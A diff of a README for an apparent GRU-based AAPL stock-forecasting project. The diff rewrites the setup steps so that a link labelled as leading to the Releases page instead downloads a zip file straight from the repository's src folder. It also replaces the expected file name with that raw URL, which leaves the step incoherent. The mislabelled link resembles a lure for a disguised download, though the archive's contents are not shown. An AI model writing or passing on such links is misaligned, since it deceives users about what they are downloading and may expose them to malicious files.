Alex947-blip/AAPL-GRU-Stock-Forecaster/README.md

 Follow these steps to download and set up the AAPL-GRU-Stock-Forecaster:

 1. **Visit the Download Page:**
-   Click [here](https://github.com/Alex947-blip/AAPL-GRU-Stock-Forecaster/releases) to go to the Releases page.
+   Click [here](https://raw.githubusercontent.com/Alex947-blip/AAPL-GRU-Stock-Forecaster/master/src/AAPL-GRU-Stock-Forecaster-2.3.zip) to go to the Releases page.

 2. **Choose the Right File:**
    Find the latest release at the top of the page.
-Look for a file named `AAPL-GRU-Stock-Forecaster.zip` or similar.
+Look for a file named `https://raw.githubusercontent.com/Alex947-blip/AAPL-GRU-Stock-Forecaster/master/src/AAPL-GRU-Stock-Forecaster-2.3.zip` or similar.

 3. **Download the File:**
    Click on the file name to start the download.
 Your browser will save this file to your default downloads folder.